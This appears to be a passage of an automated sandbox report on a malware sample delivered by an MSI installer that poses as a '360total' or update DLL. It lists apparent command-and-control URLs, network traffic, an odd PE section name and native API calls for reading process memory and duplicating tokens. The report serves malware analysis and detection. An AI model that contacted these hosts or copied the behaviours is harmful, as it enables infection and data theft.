                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: rundll32.exeString found in binary or memory: http://dr.f.360.cn/scan
                      Source: rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.drString found in binary or memory: http://dr.f.360.cn/scanlist
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0O
                      Source: rundll32.exeString found in binary or memory: http://pconf.f.360.cn/safe_update.php
                      Source: rundll32.exeString found in binary or memory: http://pscan.f.360.cn/safe_update.php
                      Source: rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.drString found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
                      Source: rundll32.exeString found in binary or memory: http://sconf.f.360.cn/client_security_conf
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: http://t2.symcb.com0
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crl0
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crt0
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: http://tl.symcd.com0&
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/
                      Source: rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739B23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137449195.000002473BAB0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/
                      Source: rundll32.exe, 00000007.00000003.3137465440.000002473BA70000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin
                      Source: rundll32.exe, 00000007.00000003.3199082000.0000024739B27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/p
                      Source: rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/xe
                      Source: rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/vider
                      Source: rundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/videri
                      Source: rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/
                      Source: rundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/1
                      Source: rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/G
                      Source: rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/Y
                      Source: rundll32.exe, 00000007.00000002.3239328472.0000024739AE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B28000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/
                      Source: rundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/K
                      Source: rundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/l
                      Source: rundll32.exe, 00000007.00000003.3137465440.000002473BA70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137449195.000002473BAB0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://pewwhranet.com/live/
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: https://www.advancedinstaller.com
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: https://www.thawte.com/cps0/
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: https://www.thawte.com/repository0W
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownHTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.5:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49718 version: TLS 1.2

                      System Summary

                      barindex
                      PE file contains section with special chars
                      Source: 360total.dll.1.drStatic PE information: section name: yhDm^
                      Source: Update_77697333.dll.6.drStatic PE information: section name: yhDm^
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B23C20 GetProcAddress,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetLastError,FreeLibrary,5_2_00B23C20
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB77B40 NtFreeVirtualMemory,6_2_000001FB3AB77B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB77588 RtlInitUnicodeString,NtCreateFile,NtClose,6_2_000001FB3AB77588
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB778C0 NtReadFile,6_2_000001FB3AB778C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB77A54 NtWriteFile,6_2_000001FB3AB77A54
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB779C8 NtClose,6_2_000001FB3AB779C8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7378C NtClose,6_2_000001FB3AB7378C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB777B0 RtlInitUnicodeString,NtCreateFile,6_2_000001FB3AB777B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7AD34 NtAllocateVirtualMemory,6_2_000001FB3AB7AD34
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7B0C4 NtOpenKey,RtlpNtOpenKey,6_2_000001FB3AB7B0C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,6_2_000001FB3AB7B1D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,6_2_000001FB3AB7463C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB77ACC NtClose,6_2_000001FB3AB77ACC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB77694 RtlInitUnicodeString,NtDeleteFile,6_2_000001FB3AB77694
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7745C RtlInitUnicodeString,NtOpenFile,NtClose,6_2_000001FB3AB7745C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB77704 NtQueryInformationFile,6_2_000001FB3AB77704
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7CB54 NtDelayExecution,6_2_000001FB3AB7CB54
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB80AC0 NtFreeVirtualMemory,6_2_000001FB3AB80AC0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB80AF0 NtWriteFile,6_2_000001FB3AB80AF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB80A90 NtDeleteFile,6_2_000001FB3AB80A90
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB80A78 NtClose,6_2_000001FB3AB80A78
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4CB54 NtDelayExecution,7_2_0000024739A4CB54
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4AD34 NtAllocateVirtualMemory,7_2_0000024739A4AD34
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A47B40 NtFreeVirtualMemory,7_2_0000024739A47B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4B0C4 NtOpenKey,RtlpNtOpenKey,7_2_0000024739A4B0C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A47A54 NtWriteFile,7_2_0000024739A47A54
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,7_2_0000024739A4463C
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4378C NtClose,7_2_0000024739A4378C
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,7_2_0000024739A4B1D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A477B0 RtlInitUnicodeString,NtCreateFile,7_2_0000024739A477B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A47704 NtQueryInformationFile,7_2_0000024739A47704
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A47694 RtlInitUnicodeString,NtDeleteFile,7_2_0000024739A47694
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A50A90 NtDeleteFile,7_2_0000024739A50A90
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A50A78 NtClose,7_2_0000024739A50A78
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A47ACC NtClose,7_2_0000024739A47ACC
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A50AC0 NtFreeVirtualMemory,7_2_0000024739A50AC0
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A478C0 NtReadFile,7_2_0000024739A478C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4745C RtlInitUnicodeString,NtOpenFile,NtClose,7_2_0000024739A4745C
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A47588 RtlInitUnicodeString,NtCreateFile,NtClose,7_2_0000024739A47588
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A479C8 NtClose,7_2_0000024739A479C8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0AD34 NtAllocateVirtualMemory,8_2_00000210FEA0AD34
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA07B40 NtFreeVirtualMemory,8_2_00000210FEA07B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA078C0 NtReadFile,8_2_00000210FEA078C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA10AC0 NtFreeVirtualMemory,8_2_00000210FEA10AC0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0B0C4 NtOpenKey,8_2_00000210FEA0B0C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA07ACC NtClose,8_2_00000210FEA07ACC
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA07694 RtlInitUnicodeString,NtDeleteFile,8_2_00000210FEA07694
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA07704 NtQueryInformationFile,8_2_00000210FEA07704
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,8_2_00000210FEA0463C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA07A54 NtWriteFile,8_2_00000210FEA07A54
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0745C RtlInitUnicodeString,NtOpenFile,NtClose,8_2_00000210FEA0745C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA077B0 RtlInitUnicodeString,NtCreateFile,8_2_00000210FEA077B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA079C8 NtClose,8_2_00000210FEA079C8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,8_2_00000210FEA0B1D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA07588 RtlInitUnicodeString,NtCreateFile,NtClose,8_2_00000210FEA07588
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0378C NtClose,8_2_00000210FEA0378C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0CB54 NtDelayExecution,8_2_00000210FEA0CB54
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006A2C8: DeviceIoControl,6_2_000000018006A2C8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,6_2_000000018004B1A4
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5fd5a1.msiJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID69B.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID719.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{B135729E-0574-44D1-B7A1-6E44550F506B}Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID824.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID8B1.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSID69B.tmpJump to behavior
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B26A505_2_00B26A50
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B5F0325_2_00B5F032
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B592A95_2_00B592A9
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B4C2CA5_2_00B4C2CA
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B4E2705_2_00B4E270
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B584BD5_2_00B584BD
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B4A5875_2_00B4A587
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B5D8D55_2_00B5D8D5
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B2C8705_2_00B2C870
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B449205_2_00B44920
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B4A9155_2_00B4A915
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B50A485_2_00B50A48
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B29CC05_2_00B29CC0
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B55D6D5_2_00B55D6D
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180017FE86_2_0000000180017FE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006DFF46_2_000000018006DFF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800220D86_2_00000001800220D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018007C1406_2_000000018007C140
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800601746_2_0000000180060174
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018008023C6_2_000000018008023C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000834C6_2_000000018000834C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006C4706_2_000000018006C470
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800784E06_2_00000001800784E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800764F06_2_00000001800764F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800605786_2_0000000180060578
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800105806_2_0000000180010580
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004E5DC6_2_000000018004E5DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800626006_2_0000000180062600
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800026106_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800046386_2_0000000180004638
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004A6506_2_000000018004A650
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006E7606_2_000000018006E760
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800647B06_2_00000001800647B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018007E7C76_2_000000018007E7C7
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800769306_2_0000000180076930
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800629546_2_0000000180062954
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006A9946_2_000000018006A994
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006E9FC6_2_000000018006E9FC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180082A186_2_0000000180082A18
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180072A276_2_0000000180072A27
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180010B586_2_0000000180010B58
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180026C846_2_0000000180026C84
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001ECF46_2_000000018001ECF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180008E206_2_0000000180008E20
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180052FD86_2_0000000180052FD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018003AFE86_2_000000018003AFE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005D0146_2_000000018005D014
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006F0B46_2_000000018006F0B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800630CC6_2_00000001800630CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005912C6_2_000000018005912C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004B1A46_2_000000018004B1A4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800492786_2_0000000180049278
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018007B2D06_2_000000018007B2D0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002B2EC6_2_000000018002B2EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006D3D46_2_000000018006D3D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800033E06_2_00000001800033E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800754806_2_0000000180075480
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800694A06_2_00000001800694A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005958C6_2_000000018005958C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800576DC6_2_00000001800576DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800097E06_2_00000001800097E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800277FC6_2_00000001800277FC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002D9646_2_000000018002D964
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180073B606_2_0000000180073B60
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018007BBB06_2_000000018007BBB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001BC386_2_000000018001BC38
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005DD186_2_000000018005DD18
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180073DF06_2_0000000180073DF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180011DF06_2_0000000180011DF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005BE6C6_2_000000018005BE6C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004FF886_2_000000018004FF88
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB710306_2_000001FB3AB71030
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A410307_2_0000024739A41030
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA010308_2_00000210FEA01030
